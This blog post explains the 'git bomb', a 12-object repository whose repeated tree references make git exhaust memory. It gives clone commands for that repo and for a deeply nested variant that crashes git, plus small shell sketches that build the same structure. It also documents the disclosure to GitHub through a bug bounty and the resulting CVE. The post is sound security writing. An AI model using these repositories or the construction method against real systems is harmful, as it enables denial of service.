Kate Murphy

Exploding Git Repositories

If you are an adventurous sort (and can handle a potential reboot) I invite you to clone this tiny repo:

$ git clone https://github.com/Katee/git-bomb.git

Were you able to clone it? Unless you have quite a lot of memory (both RAM and storage), git was killed or ran out of memory, or you had to reboot. Why is this? It is a perfectly formed repo made of only 12 objects.

How does a tiny repo cause git to run out of memory? The secret is that git de-duplicates “blobs” (which are used to store files) to make repositories smaller and to allow reusing the same blob when a file remains unchanged between commits. Git also de-duplicates “tree” objects (which define the directory structure in a repository). git-bomb tries to make billions of files (10 entries per tree across 10 levels of trees works out to 10^10 paths), yet it has only 10 references to the file blob and only 10 tree objects in all.
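
To get a feel for how few objects describe how many files, here is a back-of-the-envelope count in shell. It assumes the layout described under Structure (10 entries per tree and 10 levels of trees, plus one blob and one commit). The variable names are only illustrative, and the arithmetic needs a shell with 64-bit integers.

```shell
# Assumed shape of git-bomb: 10 entries per tree, 10 levels of trees.
width=10
depth=10

# Every level multiplies the number of reachable paths by the tree width.
files=1
level=0
while [ "$level" -lt "$depth" ]; do
  files=$((files * width))
  level=$((level + 1))
done

# Stored objects: one tree per level, plus one blob and one commit.
objects=$((depth + 2))

echo "$files files described by $objects objects"
# prints: 10000000000 files described by 12 objects
```

Each extra level adds one stored object but multiplies the number of files by ten, which is why de-duplication keeps the repo so small.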

This is extremely similar to the “billion laughs” attack (aka “XML bomb”), hence the name “git bomb”.

Structure

Bottom

At the bottom there is a file blob containing “one laugh”:

$ git show 5faa3895522087022ba6fc9e64b02653bd7c4283
one laugh

There is one tree object that refers to this blob 10 times:

$ git ls-tree 6961ae061a9b89b91162c00d55425b39a19c9f90
100644 blob 5faa3895522087022ba6fc9e64b02653bd7c4283	f0
100644 blob 5faa3895522087022ba6fc9e64b02653bd7c4283	f1
# … snipped
100644 blob 5faa3895522087022ba6fc9e64b02653bd7c4283	f9

Middle

Then there are 9 layers of tree objects, each of which refers 10 times to the tree object below it (here is the top tree object):

$ git ls-tree 106d3b1c00034193bbe91194eb8a90fc45006377
040000 tree 8d106ebc17b2de80acefd454825d394b9bc47fe6	d0
040000 tree 8d106ebc17b2de80acefd454825d394b9bc47fe6	d1
# … snipped
040000 tree 8d106ebc17b2de80acefd454825d394b9bc47fe6	d9
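
The same shape can be reproduced at a harmless scale with git's plumbing commands. This is only a sketch, not necessarily how git-bomb itself was built: it uses 3 entries per tree and 3 levels instead of 10 and 10, works in a throwaway directory from `mktemp`, and stops at the top tree without creating a commit. The names `width`, `depth`, `blob` and `tree` are made up for the example.

```shell
set -e
# Throwaway repository so nothing touches an existing checkout.
repo=$(mktemp -d)
cd "$repo"
git init -q .

# Illustrative sizes, far smaller than git-bomb.
width=3
depth=3

# Bottom: a single blob holding the file contents.
blob=$(echo "one laugh" | git hash-object -w --stdin)

# One tree listing that same blob under several names (f0, f1, ...).
tree=$(
  i=0
  while [ "$i" -lt "$width" ]; do
    printf '100644 blob %s\tf%s\n' "$blob" "$i"
    i=$((i + 1))
  done | git mktree
)

# Middle: each new tree lists the previous tree under several names (d0, d1, ...).
level=1
while [ "$level" -lt "$depth" ]; do
  tree=$(
    i=0
    while [ "$i" -lt "$width" ]; do
      printf '040000 tree %s\td%s\n' "$tree" "$i"
      i=$((i + 1))
    done | git mktree
  )
  level=$((level + 1))
done

# Compare what is stored with what a recursive walk has to expand.
objects=$(git count-objects | cut -d' ' -f1)
paths=$(git ls-tree -r "$tree" | wc -l | tr -d ' ')
echo "$objects objects stored, $paths paths when expanded"
```

With these sizes the walk should report 27 paths from 4 stored objects (1 blob and 3 trees). Raising `width` and `depth` grows the first number by one per level and the second by a factor of `width` per level.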

Top

The master ref points to a single commit, whose tree is the top-most tree object:

$ git log --pretty=format:"%s | tree: %T"
Create a git bomb | tree: 106d3b1c00034193bbe91194eb8a90fc45006377

Trying to interact with this repo using anything that has to walk the tree (git status, git checkout) runs into memory issues because git builds the tree in memory before writing files to disk. That means the process is killed instead of filling up your disk space.
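
A rough estimate shows why memory gives out. The sketch below only adds up the bytes of the path names themselves, assuming 10 entries per tree, 10 levels of trees, and that every level uses two-character names like `d0` and `f0` as in the listings above. Whatever git actually keeps per entry is not modelled here, so treat the result as a loose lower bound rather than a measurement.

```shell
# Assumptions: 10 entries per tree, 10 tree levels, names like "d0" and "f0".
width=10
depth=10

# Bytes in one full path: (depth - 1) directories of "dN/" plus a final "fN".
path_bytes=$(( (depth - 1) * 3 + 2 ))

# Number of distinct paths a full walk has to produce.
paths=1
level=0
while [ "$level" -lt "$depth" ]; do
  paths=$((paths * width))
  level=$((level + 1))
done

total_bytes=$((paths * path_bytes))
total_gb=$((total_bytes / 1000000000))
echo "$path_bytes bytes per path, about $total_gb GB of path names alone"
# prints: 29 bytes per path, about 290 GB of path names alone
```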

Other Git Bombs

Here is a slightly different version of the same idea. This repo has 15,000 nested tree objects. On my laptop this ends up blowing up the stack and causing a segfault.

$ git clone https://github.com/Katee/git-bomb-segfault.git
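
For illustration, a deep chain of trees can be sketched with the same plumbing commands. The layout is an assumption, since this post does not show how the 15,000 trees are arranged: here each tree has a single entry named `d` pointing at the tree below it, and the depth is kept at 20 so that walking it is harmless.

```shell
set -e
# Throwaway repository for the experiment.
repo=$(mktemp -d)
cd "$repo"
git init -q .

# Illustrative depth only; the repo above is described as having 15,000.
depth=20

# Innermost tree: one file named "f".
blob=$(echo "one laugh" | git hash-object -w --stdin)
tree=$(printf '100644 blob %s\tf\n' "$blob" | git mktree)

# Wrap the current tree in a new tree with a single directory entry "d".
level=0
while [ "$level" -lt "$depth" ]; do
  tree=$(printf '040000 tree %s\td\n' "$tree" | git mktree)
  level=$((level + 1))
done

# A recursive walk has to descend one level per nested tree.
path=$(git ls-tree -r "$tree" | cut -f2)
slashes=$(printf '%s' "$path" | tr -cd '/' | wc -c | tr -d ' ')
echo "one file, nested $slashes directories deep"
```

Unlike git-bomb, nothing is de-duplicated here: every tree in the chain is a distinct object, and the cost comes from how deep a recursive walk has to go rather than from how many files it produces.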

If you’d like to make your own git bombs, read the next post, “Making Your Own Git Bombs”.

Updates

2017-10-11: Got a go-ahead from GitHub on HackerOne to post this.
2017-10-12: Was awarded a bounty by GitHub on HackerOne.
2017-10-12: This post was on the front page of Hacker News and received comments.
2017-10-13: There is a discussion of this on the git mailing list. It includes a mention of a repo of this nature being uploaded to GitHub in 2014.
2017-10-14: CVE-2017-15298 💫
2017-10-15: Josh Lee uploaded a similar repo to GitHub long before me and even gave it a very similar name! The actual repo is disabled, and he never wrote about it publicly.

Thank you to Wesley for pairing on many weird git repos. He is currently looking for a job, and I can say from experience that pairing with him is fantastic. If you are hiring, get in touch with him at w.aptekar@gmail.com.